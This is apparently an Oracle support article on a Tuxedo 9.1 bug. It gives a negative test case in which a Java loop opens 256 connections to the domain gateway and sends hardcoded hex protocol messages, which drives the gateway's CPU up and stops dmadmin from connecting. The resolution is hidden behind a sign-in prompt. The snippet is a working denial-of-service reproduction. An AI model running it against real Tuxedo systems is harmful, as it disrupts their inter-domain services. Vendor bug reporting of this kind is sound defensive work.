RP/TUX 9.1 - GWTDOMAIN will not be able to process the request from dmadmin after connection attack (Doc ID 777619.1)

Last updated on NOVEMBER 04, 2016

Applies to:

Oracle Tuxedo / Tuxedo / 9.1
Information in this document applies to any platform

Goal

DESCRIPTION:

This is a negative case.

1. Set up Domain1 and Domain2.
Domain1 and Domain2 are Multi-Thread mode.
Following environment variables are setting:
GWT_SNP_TIMEOUT=5  
Domain1?s DUBB as following:
_______________________________________________________________
domain1
        NWADDR="//bjsol10:1050"
        NWDEVICE="/dev/null"
domain2
        NWADDR="//bjsol10:1051"
        NWDEVICE="/dev/null"
        MAC=ON
        MACLEVEL=0
        MAXENCRYPTBITS=40
_______________________________________________________________

2. Boot Domain1 and Domain2. Make sure that Domain1 can connect/disconnect to domain2 via dmadmin.

3. Use a Java application to connect Domain1, and send the necessary authentication message. Java code as following:
_______________________________________________________________
    for(int j=0;j<256;j++){
      try {
      Socket socket = new Socket("bjsol10", 1050);
      System.out.println(socket);
      DataOutputStream outbound = new DataOutputStream(socket.getOutputStream());
      DataInputStream inbound = new DataInputStream(socket.getInputStream());

      System.out.println("-----------------"+j+"-------------------");
            
      sendbuf =
"739038420000000E00000044FFFFFFFF0000000300000001200000010000021C000000640000006F0000006D00000061000000
690000006E000000320000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000005A00000011000000030000007F";
      for(i=0;i<sendbuf.length()/2;i++){
          str = sendbuf.substring(i*2,i*2+2);
          b[i] = (byte)Integer.parseInt(str,16);
      }
      for(i=0;i<1;i++){
          outbound.write(b,0,sendbuf.length()/2);
      }
      System.out.println("Send OK 1111111");
      len =  inbound.read(b2,0,4096);
      System.out.println(len);
      System.out.println("Recv OK 111111");

      sendbuf =
"00000000000000110000000000000000000001F88000000100000000000000009103985800000010000304020000000
10000017C00000030000000064341525241590000000000007CAFEBA700000001000000000000000000000002000000
DB00000060000000003081D806092A864886F70D0103013081CA026100D3E2743B879FD3203BDE2F717EFB82D560
2A08FB79584C53357A2B9B88EEB8BAE75CD98F2DEF1F4F9FA47EE3865927C6F8C97D9347B49707B7FA8E472336F
ED045C1A3B297A54E82DA5CEE25950DCCA72334D4D7A24E153E9CB6A197FEFE8CC30261008677818A30895450D
311B750BC969B2423EF86F1497C5016DFADEC904B40F5E56DF03BA9ECA9BC4E0CDD214E82BD1F36A6571384EC0
40E8D96850D97EB49E35B3F538B04666EE67D8443ADCE3C8E411E487408F3F59EEA6EEFE98B303CE531DB02020
080009250AB08FC303CAE6AB22289436FE81DAF764FCCBA57A5174F92BE1F0A22E30D38DCEDF7ECDED8D3CAB3
ADAFE179702D49CC14392E3D7DF889F7DB8D5483EB8606B9A5EAB0FE43BCE9DE8E8DC3BD65F1E7F0F20D326A
75251CA4DD90CB07016F000000000007000200000050000012300000001400000046FFFFFFFF000000000000000000
0000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
      for(i=0;i<sendbuf.length()/2;i++){
          str = sendbuf.substring(i*2,i*2+2);
          b[i] = (byte)Integer.parseInt(str,16);
      }
      outbound.write(b,0,sendbuf.length()/2);
      System.out.println("Send OK 222222");
      
      len =  inbound.read(b2,0,4096);
      System.out.println(len);
      System.out.println("Recv OK 222222");

_______________________________________________________________

The Java Application code will be attached.

4. After step 3 finished, Domain1 GWTDOMAIN?s CPU will achieve 49.93%. Domain1 cannot connect to domain2 via dmadmin.

CONFIGURATION:
Domain1: 
Tuxedo 9.1+RP(Load 3.2)
Solaris 9(32 bit)

Domain2:
Tuxedo 9.1+RP(Load 3.2)
Solaris 9(32 bit)

Solution

Sign In with your My Oracle Support account

Don't have a My Oracle Support account? Click to get started

My Oracle Support provides customers with access to over a
Million Knowledge Articles and hundreds of Community platforms